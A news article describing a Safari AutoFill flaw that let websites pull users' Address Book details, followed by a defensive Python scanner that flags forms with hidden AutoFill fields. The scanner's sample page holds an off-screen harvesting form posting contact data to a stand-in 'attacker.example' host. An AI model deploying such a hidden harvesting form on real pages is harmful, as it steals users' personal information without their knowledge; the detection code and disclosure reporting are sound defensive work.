Another weakness in Apple Safari: AutoFill leaks personal information

Apple’s Safari browser has had a rough run lately, and its troubles have only increased: another serious flaw has been found in the browser, and it can be used to extract sensitive information about the user. The feature involved, AutoFill, was designed to make filling in web forms easier. Attackers, however, can use the same facility to extract that information for themselves.

The issue was pointed out by Jeremiah Grossman, founder and CTO of WhiteHat Security. He reported that an attacker can easily make Safari AutoFill sensitive details such as name, address or e-mail address from the user’s local Address Book (the operating system’s contacts application). The feature was meant to make life simpler: when Safari recognizes a form, it fills in information such as first and last name, workplace, city, state and e-mail address, and it is enabled by default.

The problem is that the feature populates the form even when the user has never entered any data on that particular site, and this is what an attacker can exploit. Safari is especially exposed here: it hands the data to a website even if the user has never visited it before or typed any personal information into it, so a malicious page need only present a form and collect whatever AutoFill puts into it.
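The pattern described above can also be checked for from the defender’s side. The following Python script is an added example written for this article; it is neither Grossman’s proof of concept nor anything from Apple. It parses fetched HTML (as a crawler or proxy would) and flags forms that ask for the Address Book fields the article says AutoFill populates (name, company, city, state, e-mail) while keeping those fields out of the user’s view. The list of field names, the hiding heuristic (an attacker would presumably keep the auto-filled values invisible, which the article does not state) and the sample page are all constructed assumptions.

```python
"""Heuristic scanner for forms that could harvest Safari AutoFill data.

Added example for this article, not Grossman's proof of concept and not
Apple's code. Flags <form>s whose AutoFill-able inputs are all hidden.
"""
from html.parser import HTMLParser
import re

# Tokens matching the Address Book data the article lists, plus a few
# common synonyms (assumed; Safari's real matching rules are not on the page).
AUTOFILL_TOKENS = {"name", "firstname", "lastname", "fullname", "fname", "lname",
                   "company", "organization", "organisation", "employer",
                   "city", "state", "email", "mail"}

# Inline styles that take an element out of view (assumed attacker technique).
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|opacity\s*:\s*0(?![.\d])|"
    r"(?:left|top)\s*:\s*-\d{3,}px", re.I)

# Input types AutoFill would not populate with contact data (assumption).
NON_TEXT_TYPES = {"hidden", "submit", "button", "reset", "password",
                  "checkbox", "radio", "file", "image"}

# Elements with no closing tag; they must not affect the nesting stack.
VOID = {"input", "br", "img", "meta", "link", "hr", "area", "base", "col",
        "embed", "param", "source", "track", "wbr"}


def looks_autofillable(field_name):
    """True if a field name such as 'first_name' or 'your-email' names contact data."""
    tokens = re.split(r"[^a-z0-9]+", field_name.lower())
    return any(t in AUTOFILL_TOKENS for t in tokens) or "".join(tokens) in AUTOFILL_TOKENS


class AutoFillFormScanner(HTMLParser):
    """Collects, per <form>, which AutoFill-able inputs it has and which are hidden."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._form = None
        self._hidden_stack = []  # one bool per open non-void element

    @staticmethod
    def _is_hidden(attrs):
        return "hidden" in attrs or bool(HIDDEN_STYLE.search(attrs.get("style") or ""))

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        # An element is hidden if it or any open ancestor is hidden.
        hidden = self._is_hidden(attrs) or any(self._hidden_stack)
        if tag == "form":
            self._form = {"action": attrs.get("action") or "",
                          "autofill_fields": [], "hidden_fields": []}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            if (attrs.get("type") or "text").lower() not in NON_TEXT_TYPES:
                name = attrs.get("name") or attrs.get("id") or ""
                if looks_autofillable(name):
                    self._form["autofill_fields"].append(name)
                    if hidden:
                        self._form["hidden_fields"].append(name)
        if tag not in VOID:
            self._hidden_stack.append(hidden)

    def handle_endtag(self, tag):
        if tag not in VOID and self._hidden_stack:
            self._hidden_stack.pop()
        if tag == "form":
            self._form = None


def scan_forms(html):
    """Return one report per form; 'suspicious' means every AutoFill-able field is hidden."""
    scanner = AutoFillFormScanner()
    scanner.feed(html)
    scanner.close()
    for form in scanner.forms:
        form["suspicious"] = (bool(form["autofill_fields"]) and
                              len(form["hidden_fields"]) == len(form["autofill_fields"]))
    return scanner.forms


# Constructed sample page: a normal contact form plus an off-screen harvesting form.
SAMPLE_PAGE = """
<html><body>
<h1>Contact us</h1>
<form action="/contact" method="post">
  <label>Name <input type="text" name="name"></label>
  <label>E-mail <input type="text" name="email"></label>
  <label>Message <textarea name="message"></textarea></label>
  <input type="submit" value="Send">
</form>
<div style="position:absolute; left:-9999px; top:-9999px">
  <form action="http://attacker.example/collect" method="post">
    <input type="text" name="name">
    <input type="text" name="company">
    <input type="text" name="city">
    <input type="text" name="state">
    <input type="text" name="email">
    <input type="hidden" name="token" value="x">
  </form>
</div>
</body></html>
"""

if __name__ == "__main__":
    for report in scan_forms(SAMPLE_PAGE):
        flag = "SUSPICIOUS" if report["suspicious"] else "ok"
        print(f"{flag:10} {report['action']}: autofill={report['autofill_fields']} "
              f"hidden={report['hidden_fields']}")
```

The visible contact form asks for a name and e-mail address too, so field names alone are not evidence; the scanner only raises a flag when every AutoFill-able field in a form is out of the user’s sight, which is the combination that makes the silent population described above useful to an attacker.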

Proof-of-concept code for the attack has been posted online, and Grossman also posted a video of the attack on his blog. To everyone’s relief, no malicious use of the flaw has been reported so far. The attack could have reached an enormous audience had it been distributed through an advertising network. The risk to users is nonetheless limited: the technique is so simple that it has so far attracted little attacker interest, and it leaks a few personal details rather than executing code, so it is not the kind of exploit used to deliver a rootkit payload.

Grossman reported the problem to Apple on April 17th, but a reply or official statement from the company is still awaited.

The remedy is as simple as the problem: users can turn off AutoFill for web forms in Safari’s AutoFill preferences, where the option that draws on the Address Book card is the one that matters here. AutoFill features exist in other browsers too, including Safari on iOS and Google Chrome, but the threat demonstrated here applies only to Safari on Mac OS, which has a very small market share. The attack is therefore limited to the relatively few people who use Safari on Mac OS.
